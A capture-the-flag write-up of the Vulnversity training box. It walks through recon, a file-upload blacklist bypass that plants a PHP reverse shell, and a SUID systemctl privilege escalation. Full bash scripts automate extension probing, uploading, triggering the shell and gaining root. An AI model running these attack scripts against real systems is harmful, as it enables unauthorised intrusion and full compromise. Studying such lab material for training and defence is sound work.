OSCP Prep: Vulnversity without metasploit

Learn about active recon, web app attacks and privilege escalation.

In the nmap scan I see several ports open, but 3333 stands out for two reasons:

1. HTTP normally runs on port 80, not 3333.

2. The HTTP title is Vuln University, which is the name of this box.

So I browsed to the IP address on that port and found a website.

From here I used dirsearch to discover hidden directories and found /internal/, which turns out to be an upload page.

From here I downloaded a PHP reverse shell and opened it in a text editor, changing the IP address in the file to my VPN address (the tun0/tap0 interface).

My VPN Ip address is

You can leave the port as it is.

I attempted to upload the file, but the .php extension is blocked. The .phtml extension is allowed on this server, so I renamed the file with that extension, and the upload succeeded.

A second dirsearch run found /internal/uploads/, where the uploaded files are stored. Once the reverse shell has been submitted through the upload page on /internal/, requesting it under /internal/uploads/ makes the web server execute it and connect back (this is what activates the reverse shell). Here is the dirsearch output showing the uploads directory:

Start a listener on the port set in the payload with nc -lnvp 1234, then execute the payload by browsing to the uploaded file at the following URL. I now have a shell on the machine.
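The foothold steps above (service scan, directory discovery, pointing the reverse shell at the listener, bypassing the .php blacklist, uploading, and triggering the file) as one shell script. This is an added example, not the writeup's own commands. The multipart field name "file", the upload endpoint /internal/index.php, the target address 10.10.10.10 and the attacker address 10.8.0.2 are assumptions for illustration (the page's screenshots hold the real values), and the sed rewrites assume pentestmonkey's php-reverse-shell.php layout, where the address and port are the $ip and $port variables at the top of the file.

```bash
#!/usr/bin/env bash
# Added example (not the original writeup's commands): the foothold steps
# as shell functions.  Assumptions not stated on the page: the upload form
# posts a multipart field named "file" to /internal/index.php, and the
# target/attacker addresses below are placeholders.

TARGET="${TARGET:-10.10.10.10}"      # placeholder target address
LHOST="${LHOST:-10.8.0.2}"           # placeholder tun0 address
LPORT="${LPORT:-1234}"               # same port as the nc listener
BASE="http://${TARGET}:3333"

# Step 1: service scan, then brute-force directories on the web port.
recon() {
    nmap -sC -sV -oN nmap.txt "$TARGET"
    dirsearch -u "$BASE" -e php,phtml,txt
}

# Step 2: point pentestmonkey's php-reverse-shell at our listener and save
# it under a different extension.  Prints the path of the new file.
prepare_payload() {                  # usage: prepare_payload php-reverse-shell.php phtml
    local template="$1" ext="$2" out
    out="${template%.php}.${ext}"
    # [$] is a literal dollar sign in the sed pattern; the rest of each
    # line (including the "// CHANGE THIS" comment) is replaced.
    sed -e "s/^[$]ip = .*/\$ip = '${LHOST}';/" \
        -e "s/^[$]port = .*/\$port = ${LPORT};/" "$template" > "$out"
    printf '%s\n' "$out"
}

# Step 3: submit a file to the upload form and show the server's answer.
upload() {                           # usage: upload ./php-reverse-shell.phtml
    curl -s -F "file=@$1" "${BASE}/internal/index.php"
}

# Find an extension the blacklist lets through: .php is rejected on this
# box, .phtml is not.  Prints the first 80 characters of each reply.
probe_extensions() {                 # usage: probe_extensions php-reverse-shell.php
    local ext payload
    for ext in php php3 php4 php5 phtml phar; do
        payload=$(prepare_payload "$1" "$ext")
        printf '%-6s -> ' "$ext"
        upload "$payload" | tr -s '[:space:]' ' ' | cut -c1-80
        echo
    done
}

# Step 4: with "nc -lnvp $LPORT" running in another terminal, request the
# uploaded file so the web server executes it and connects back.  The
# request never completes normally while the shell is alive, hence -m 5.
trigger() {                          # usage: trigger ./php-reverse-shell.phtml
    curl -s -m 5 "${BASE}/internal/uploads/$(basename "$1")" > /dev/null
}

# Dispatcher: ./foothold.sh recon | probe <template> | upload <file> | trigger <file>
case "${1:-}" in
    recon)   recon ;;
    probe)   probe_extensions "$2" ;;
    upload)  upload "$2" ;;
    trigger) trigger "$2" ;;
esac
```

Run `probe` first to see which extension the form accepts instead of guessing, then `upload` the accepted file, start the listener, and `trigger` it. The listener port and the `$port` in the payload must match, which is why both read `LPORT`.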

Here I found the user flag.

From here I hosted linpeas.sh on a server so I could download it onto the target and run it.

Here linpeas flags a SUID binary: /bin/systemctl has the SUID bit set, which lets us run a service unit as root.

I slightly modified the script that was provided, changing its ExecStart so that it sets the SUID bit on /bin/bash:


TF=$(mktemp).service
echo '[Service]
ExecStart=/bin/sh -c "chmod +s /bin/bash"
[Install]
WantedBy=multi-user.target' > $TF
/bin/systemctl link $TF
/bin/systemctl enable --now $TF

From here I copied and pasted the whole systemctl SUID script into the shell and gained root.
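The same escalation as checkable steps: confirm the linpeas finding, build the unit, run it through the SUID systemctl, and verify the result before using it. This is an added example, not the writeup's script; the unit content follows the systemctl SUID pattern the writeup adapted, the unit file name is generated with mktemp, and the dispatcher sub-command names are my own.

```bash
#!/usr/bin/env bash
# Added example (not the original writeup's script): the systemctl SUID
# escalation broken into steps that can each be checked.

# Confirm the linpeas finding directly: a SUID file has the s bit in the
# owner execute position, which test(1) exposes as -u.
is_suid() {                       # usage: is_suid /bin/systemctl
    [ -u "$1" ]
}

# List every SUID file on the box (what linpeas did for us).
list_suid() {
    find / -perm -4000 -type f 2>/dev/null
}

# The unit systemd will run as root.  Printed rather than written so it
# can be inspected first; chmod +s on /bin/bash is the writeup's payload.
make_unit() {
    cat <<'EOF'
[Service]
Type=oneshot
ExecStart=/bin/sh -c "chmod +s /bin/bash"
[Install]
WantedBy=multi-user.target
EOF
}

# Link and start the unit through the SUID systemctl, then confirm that
# /bin/bash actually picked up the bit before trying to use it.
escalate() {
    local tf
    is_suid /bin/systemctl || { echo "systemctl is not SUID here" >&2; return 1; }
    tf="$(mktemp).service"        # systemctl link needs an absolute path
    make_unit > "$tf"
    /bin/systemctl link "$tf"
    /bin/systemctl enable --now "$tf"
    if is_suid /bin/bash; then
        echo "/bin/bash is now SUID; run: /bin/bash -p"
    else
        echo "unit ran but /bin/bash is not SUID; check: systemctl status $(basename "$tf")" >&2
        return 1
    fi
}

# Dispatcher: ./privesc.sh check | list | unit | escalate
case "${1:-}" in
    check)    is_suid /bin/systemctl && echo "SUID: /bin/systemctl" ;;
    list)     list_suid ;;
    unit)     make_unit ;;
    escalate) escalate ;;
esac
```

The `-p` on the final `/bin/bash -p` matters: when bash starts with an effective UID that differs from the real UID it resets the effective UID unless `-p` (privileged mode) is given, so a plain `/bin/bash` would silently drop the root privileges the SUID bit just granted. The `[Install]` section is what makes `systemctl enable` valid for the unit; without it `WantedBy` is ignored.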

eJPT | Sec+ | Cyber Security Enthusiast. I plan on obtaining the eCPPTv2 and OSCP in 2021. Just documenting my experience of becoming a pentester along the way.